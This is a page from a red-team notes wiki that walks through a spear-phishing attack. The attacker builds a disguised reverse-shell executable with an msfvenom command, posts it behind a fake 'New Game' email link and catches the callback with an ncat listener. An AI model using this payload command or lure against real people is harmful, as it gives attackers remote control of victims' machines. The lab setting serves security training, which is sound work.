📓
Red Team Notes
  • Introduction
  • Red Team Notes 2.0
  • Red Team
  • Initial Access
    • Spear Phishing Links
      • HTA Files
      • Binaries
      • PDF Files
      • SET(Social-Engineering Toolkit)
    • Spear Phishing Attachments
      • Macros
      • Dynamic Data Exchange
      • SCR Files
      • LNK Files
    • (+) Links and Attachments
  • Execution
    • Component Object Model and Distributed COM
    • MSHTA
    • PowerShell
    • Rundll32
    • Scheduled Tasks
    • Scripting
    • Trusted Developer Utilities
      • MSBuild
      • Regsvr32
    • Windows Remote Management
    • Windows Management Instrumentation (WMI)
  • Persistence
    • Scheduled Tasks
    • Create Account
    • DLL Search Order Hijacking
    • Hooking
    • Logon Scripts
    • Modify Existing Service
    • New Service
    • Path Interception
    • Registry Keys / StartUp Folder
    • ShortCut Modification
  • Privesc
    • Access Token Manipulation
    • DLL Search Order Hijacking
    • Exploitation for Privesc
    • File System Permissions Weakness
    • Always Install Elevated
  • Defense Evasion
  • Credential Access
    • Credential Dumping
    • Kerberoasting
    • LLMNR/NBT-NS Poisoning and Relay
  • Discovery
  • Lateral Movement
    • Pass the Ticket
    • Pass the Hash
    • Remote Desktops
    • Internal Spearphishing
    • Windows Admin Shares
    • Component Object Model and Distributed COM
    • Windows Remote Management
  • Collection
  • Command and Control
  • Exfiltration
  • Impact
  • Active Directory
    • Introduction
      • Kerberos
      • LDAP
    • Enumeration
    • Attacks
      • Unconstrained Delegation
      • Constrained Delegation
      • DCSync
      • Kerberoasting
      • Silver Tickets
      • Golden Tickets
  • Detection
    • Detection
    • Initial Access
    • Execution
      • MSHTA (Detection)
  • Resources & References
    • References & Resources
Powered by GitBook
On this page

Was this helpful?

  1. Initial Access
  2. Spear Phishing Links

Binaries

The use of binaries has highly decreased but this is still a good example on how User's download EXE files and give access to attackers

PreviousHTA FilesNextPDF Files

Last updated 5 years ago

Was this helpful?

This is an old form of attack not widely used as of time of writing but has been effective in previous time's.

I will demonstrate a simple chat email that will contain a link to download the executable that way it evades the Email providers security measures in scanning the binary. This will simple give the user a prompt to download or run the binary.

I will create a simply binary using msfvenom tool this is the following command I used, this tool is very well known in the industry so chances of detection are incredibly high. Obfuscation, packaging and other methods may be used for Evasion. This can also be considered an attachment

msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=192.168.56.103 LPORT=1337 --encoder x64/xor --iterations 9 --format exe --out game.exe

We need to host our binary on a server we controlled so this can be properly delivered as this is a simple DEMO, I used python to host an HTTP server to send a link to the user which will immediately download to the machine.

As simple email asking the user to download this New Game so we can play online. The user views the Mail

Once clicking on the link there will be a prompt for the User to Run or Save for these purposes we will go directly and Run the EXE file.

File gets executed

And on our attacking machine we will setup a listener using ncat (this can be any personal choice there are many other available options.